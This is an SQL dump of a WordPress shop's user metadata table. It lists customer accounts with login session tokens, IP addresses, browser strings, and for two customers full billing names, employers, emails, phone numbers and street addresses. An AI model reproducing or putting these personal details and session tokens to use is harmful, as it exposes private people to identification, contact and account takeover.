INSERT INTO `wp_usermeta` VALUES (1396, 68, '_godaddy_migration_code', 'bdff49078671957daa8629f080bb4af0'); 
INSERT INTO `wp_usermeta` VALUES (1399, 69, 'nickname', 'mabel.bohringer.ctr'); 
INSERT INTO `wp_usermeta` VALUES (1400, 69, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1401, 69, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1402, 69, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1403, 69, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1404, 69, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1405, 69, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1406, 69, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1407, 69, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1408, 69, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1409, 69, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1410, 69, '_yoast_wpseo_profile_updated', '1476377362'); 
INSERT INTO `wp_usermeta` VALUES (1412, 69, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1414, 70, 'nickname', 'amanda.haines'); 
INSERT INTO `wp_usermeta` VALUES (1415, 70, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1416, 70, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1417, 70, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1418, 70, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1419, 70, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1420, 70, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1421, 70, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1422, 70, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1423, 70, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1424, 70, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1425, 70, '_yoast_wpseo_profile_updated', '1476379519'); 
INSERT INTO `wp_usermeta` VALUES (1427, 70, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1428, 71, 'nickname', 'ruhl'); 
INSERT INTO `wp_usermeta` VALUES (1429, 71, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1430, 71, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1431, 71, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1432, 71, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1433, 71, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1434, 71, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1435, 71, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1436, 71, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1437, 71, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1438, 71, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1439, 71, '_yoast_wpseo_profile_updated', '1476381550'); 
INSERT INTO `wp_usermeta` VALUES (1440, 71, 'session_tokens', 'a:1:{s:64:"01a1a26b7429e6f451aa502b4e60706cf4b4fdbeb0c1f7bf4e81d9ee7a9bef53";a:4:{s:10:"expiration";i:1477591151;s:2:"ip";s:13:"199.48.185.53";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1476381551;}}'); 
INSERT INTO `wp_usermeta` VALUES (1441, 71, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1444, 72, 'nickname', 'paul.dean'); 
INSERT INTO `wp_usermeta` VALUES (1445, 72, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1446, 72, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1447, 72, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1448, 72, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1449, 72, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1450, 72, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1451, 72, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1452, 72, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1453, 72, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1454, 72, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1455, 72, '_yoast_wpseo_profile_updated', '1476388517'); 
INSERT INTO `wp_usermeta` VALUES (1456, 72, 'session_tokens', 'a:1:{s:64:"90c8f7eccc15c513bd93a39243643df065ec42809314d58ce27495069251a247";a:4:{s:10:"expiration";i:1477598118;s:2:"ip";s:13:"166.20.224.12";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1476388518;}}'); 
INSERT INTO `wp_usermeta` VALUES (1457, 72, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1458, 73, 'nickname', 'Mflores'); 
INSERT INTO `wp_usermeta` VALUES (1459, 73, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1460, 73, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1461, 73, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1462, 73, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1463, 73, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1464, 73, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1465, 73, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1466, 73, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1467, 73, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1468, 73, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1469, 73, '_yoast_wpseo_profile_updated', '1476391082'); 
INSERT INTO `wp_usermeta` VALUES (1470, 73, 'session_tokens', 'a:1:{s:64:"70e53999356bcb83666daf7f5c2320c9df64ec7adbc0d3a98e64b5cd2d209053";a:4:{s:10:"expiration";i:1477600683;s:2:"ip";s:14:"216.227.251.66";s:2:"ua";s:65:"Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0";s:5:"login";i:1476391083;}}'); 
INSERT INTO `wp_usermeta` VALUES (1471, 26, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1472, 33, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (1473, 33, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (1474, 33, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (1475, 33, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (1476, 33, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (1477, 33, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (1478, 33, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1479, 33, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1480, 33, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (1481, 33, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (1482, 33, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (1483, 33, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (1484, 33, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (1485, 33, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (1486, 33, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (1487, 33, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (1488, 33, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (1489, 33, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (1498, 74, 'nickname', 'nikitas4pnik'); 
INSERT INTO `wp_usermeta` VALUES (1499, 74, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1500, 74, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1501, 74, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1502, 74, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1503, 74, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1504, 74, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1505, 74, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1506, 74, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1507, 74, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1508, 74, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1509, 74, '_yoast_wpseo_profile_updated', '1476696970'); 
INSERT INTO `wp_usermeta` VALUES (1510, 74, 'session_tokens', 'a:1:{s:64:"30803612a2fcf260565a7ddc8e3ca75b6262ce6448b8fbcd6605791a0440a409";a:4:{s:10:"expiration";i:1477906571;s:2:"ip";s:13:"107.172.81.35";s:2:"ua";s:69:"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17";s:5:"login";i:1476696971;}}'); 
INSERT INTO `wp_usermeta` VALUES (1511, 74, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1512, 75, 'nickname', 'amanda.c.crafton'); 
INSERT INTO `wp_usermeta` VALUES (1513, 75, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1514, 75, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1515, 75, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1516, 75, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1517, 75, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1518, 75, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1519, 75, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1520, 75, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1521, 75, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1522, 75, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1523, 75, '_yoast_wpseo_profile_updated', '1476716317'); 
INSERT INTO `wp_usermeta` VALUES (1524, 75, 'session_tokens', 'a:1:{s:64:"c94edeecb73d6547b69a7c6d1678560048d42fc2ef01199171408db1fbddbc5f";a:4:{s:10:"expiration";i:1477925918;s:2:"ip";s:14:"199.107.68.203";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36";s:5:"login";i:1476716318;}}'); 
INSERT INTO `wp_usermeta` VALUES (1525, 75, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1527, 76, 'nickname', 'stevenwhong12'); 
INSERT INTO `wp_usermeta` VALUES (1528, 76, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1529, 76, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1530, 76, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1531, 76, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1532, 76, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1533, 76, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1534, 76, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1535, 76, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1536, 76, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1537, 76, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1538, 76, '_yoast_wpseo_profile_updated', '1476738133'); 
INSERT INTO `wp_usermeta` VALUES (1540, 77, 'nickname', 'lisa.dunne'); 
INSERT INTO `wp_usermeta` VALUES (1541, 77, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1542, 77, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1543, 77, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1544, 77, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1545, 77, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1546, 77, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1547, 77, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1548, 77, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1549, 77, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1550, 77, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1551, 77, '_yoast_wpseo_profile_updated', '1476747679'); 
INSERT INTO `wp_usermeta` VALUES (1553, 77, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1554, 78, 'nickname', 'jzec'); 
INSERT INTO `wp_usermeta` VALUES (1555, 78, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1556, 78, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1557, 78, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1558, 78, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1559, 78, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1560, 78, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1561, 78, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1562, 78, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1563, 78, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1564, 78, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1565, 78, '_yoast_wpseo_profile_updated', '1476782644'); 
INSERT INTO `wp_usermeta` VALUES (1566, 78, 'session_tokens', 'a:1:{s:64:"c18b424ad9f513dcef687d4d21b5e0cb12eb641813e99e54be75ba8156dc2cf1";a:4:{s:10:"expiration";i:1477992244;s:2:"ip";s:13:"50.187.133.56";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1476782644;}}'); 
INSERT INTO `wp_usermeta` VALUES (1567, 78, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1568, 79, 'nickname', 'donnie.holmquist'); 
INSERT INTO `wp_usermeta` VALUES (1569, 79, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1570, 79, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1571, 79, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1572, 79, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1573, 79, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1574, 79, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1575, 79, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1576, 79, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1577, 79, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1578, 79, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1579, 79, '_yoast_wpseo_profile_updated', '1476791702'); 
INSERT INTO `wp_usermeta` VALUES (1580, 79, 'session_tokens', 'a:1:{s:64:"e019bf929ea846e1dfbe37b016a33035f3ad949596589401a2b7d3b0fc015f61";a:4:{s:10:"expiration";i:1478001303;s:2:"ip";s:14:"67.222.211.157";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1476791703;}}'); 
INSERT INTO `wp_usermeta` VALUES (1581, 79, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1582, 80, 'nickname', 'lfarren'); 
INSERT INTO `wp_usermeta` VALUES (1583, 80, 'first_name', 'Nic'); 
INSERT INTO `wp_usermeta` VALUES (1584, 80, 'last_name', 'Djiounas'); 
INSERT INTO `wp_usermeta` VALUES (1585, 80, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1586, 80, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1587, 80, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1588, 80, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1589, 80, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1590, 80, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1591, 80, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1592, 80, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1593, 80, '_yoast_wpseo_profile_updated', '1476792804'); 
INSERT INTO `wp_usermeta` VALUES (1594, 80, 'session_tokens', 'a:1:{s:64:"1c63dc0b0e780ea78f15abbb44586d1425a5394988717a880de341ed0b799aaa";a:4:{s:10:"expiration";i:1478002404;s:2:"ip";s:11:"70.168.8.60";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1476792804;}}'); 
INSERT INTO `wp_usermeta` VALUES (1595, 80, 'billing_first_name', 'Nic'); 
INSERT INTO `wp_usermeta` VALUES (1596, 80, 'billing_last_name', 'Djiounas'); 
INSERT INTO `wp_usermeta` VALUES (1597, 80, 'billing_company', 'Paramount Machine Co.'); 
INSERT INTO `wp_usermeta` VALUES (1598, 80, 'billing_email', 'lfarren@paramountmachineco.com'); 
INSERT INTO `wp_usermeta` VALUES (1599, 80, 'billing_phone', '860-646-4504'); 
INSERT INTO `wp_usermeta` VALUES (1600, 80, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (1601, 80, 'billing_address_1', '138 Sanrico Drive'); 
INSERT INTO `wp_usermeta` VALUES (1602, 80, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (1603, 80, 'billing_city', 'Manchester'); 
INSERT INTO `wp_usermeta` VALUES (1604, 80, 'billing_state', 'CT'); 
INSERT INTO `wp_usermeta` VALUES (1605, 80, 'billing_postcode', '06042'); 
INSERT INTO `wp_usermeta` VALUES (1606, 80, 'last_update', '1476792945'); 
INSERT INTO `wp_usermeta` VALUES (1607, 80, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1608, 81, 'nickname', 'bclarke'); 
INSERT INTO `wp_usermeta` VALUES (1609, 81, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1610, 81, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1611, 81, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1612, 81, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1613, 81, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1614, 81, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1615, 81, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1616, 81, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1617, 81, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1618, 81, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1619, 81, '_yoast_wpseo_profile_updated', '1476803290'); 
INSERT INTO `wp_usermeta` VALUES (1620, 81, 'session_tokens', 'a:1:{s:64:"d2184310c087691748fe8afb894b03b026cf78edefa4a5823a5c24aac997adaf";a:4:{s:10:"expiration";i:1478012890;s:2:"ip";s:13:"24.39.119.102";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1476803290;}}'); 
INSERT INTO `wp_usermeta` VALUES (1621, 81, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1622, 82, 'nickname', 'Sarah.Lakewood'); 
INSERT INTO `wp_usermeta` VALUES (1623, 82, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1624, 82, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1625, 82, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1626, 82, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1627, 82, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1628, 82, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1629, 82, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1630, 82, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1631, 82, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1632, 82, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1633, 82, '_yoast_wpseo_profile_updated', '1476815221'); 
INSERT INTO `wp_usermeta` VALUES (1634, 82, 'session_tokens', 'a:1:{s:64:"d0a920975d8f7ae406ff0f97c7bbb1226a3774669f29770fe8c177b727a93cf6";a:4:{s:10:"expiration";i:1479413523;s:2:"ip";s:12:"68.115.50.82";s:2:"ua";s:128:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393";s:5:"login";i:1478203923;}}'); 
INSERT INTO `wp_usermeta` VALUES (1635, 82, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1636, 83, 'nickname', 'javier.esquivel'); 
INSERT INTO `wp_usermeta` VALUES (1637, 83, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1638, 83, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1639, 83, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1640, 83, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1641, 83, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1642, 83, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1643, 83, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1644, 83, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1645, 83, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1646, 83, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1647, 83, '_yoast_wpseo_profile_updated', '1476816513'); 
INSERT INTO `wp_usermeta` VALUES (1648, 83, 'session_tokens', 'a:1:{s:64:"dc00874692ca051a71f51e35df95b19cfc1ce4fd08a71a8998e72e940c7ef52c";a:4:{s:10:"expiration";i:1478026113;s:2:"ip";s:12:"71.40.12.162";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1476816513;}}'); 
INSERT INTO `wp_usermeta` VALUES (1649, 83, 'billing_first_name', 'John'); 
INSERT INTO `wp_usermeta` VALUES (1650, 83, 'billing_last_name', 'Sparrow'); 
INSERT INTO `wp_usermeta` VALUES (1651, 83, 'billing_company', 'Intertek Automotive Research'); 
INSERT INTO `wp_usermeta` VALUES (1652, 83, 'billing_email', 'javier.esquivel@intertek.com'); 
INSERT INTO `wp_usermeta` VALUES (1653, 83, 'billing_phone', '2105234696'); 
INSERT INTO `wp_usermeta` VALUES (1654, 83, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (1655, 83, 'billing_address_1', '5404 Bandera Rd.'); 
INSERT INTO `wp_usermeta` VALUES (1656, 83, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (1657, 83, 'billing_city', 'San Antonio'); 
INSERT INTO `wp_usermeta` VALUES (1658, 83, 'billing_state', 'TX'); 
INSERT INTO `wp_usermeta` VALUES (1659, 83, 'billing_postcode', '78238'); 
INSERT INTO `wp_usermeta` VALUES (1660, 83, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1661, 84, 'nickname', 'jessica_szakos'); 
INSERT INTO `wp_usermeta` VALUES (1662, 84, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1663, 84, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1664, 84, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1665, 84, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1666, 84, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1667, 84, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1668, 84, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1669, 84, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1670, 84, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1671, 84, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1672, 84, '_yoast_wpseo_profile_updated', '1476820160'); 
INSERT INTO `wp_usermeta` VALUES (1673, 84, 'session_tokens', 'a:1:{s:64:"a9420a7e0dcfc8fa4ba1ba77fac5e03b6e9d6d5e23903cb0b8703668e5b9c578";a:4:{s:10:"expiration";i:1478029761;s:2:"ip";s:14:"143.62.140.211";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1476820161;}}'); 
INSERT INTO `wp_usermeta` VALUES (1674, 84, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1675, 85, 'nickname', 'hannamitiku'); 
INSERT INTO `wp_usermeta` VALUES (1676, 85, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1677, 85, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1678, 85, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1679, 85, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1680, 85, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1681, 85, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1682, 85, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1683, 85, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1684, 85, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1685, 85, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1686, 85, '_yoast_wpseo_profile_updated', '1476866208'); 
INSERT INTO `wp_usermeta` VALUES (1688, 86, 'nickname', 'john.giles'); 
INSERT INTO `wp_usermeta` VALUES (1689, 86, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1690, 86, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1691, 86, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1692, 86, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1693, 86, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1694, 86, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1695, 86, 'use_ssl', '0'); 
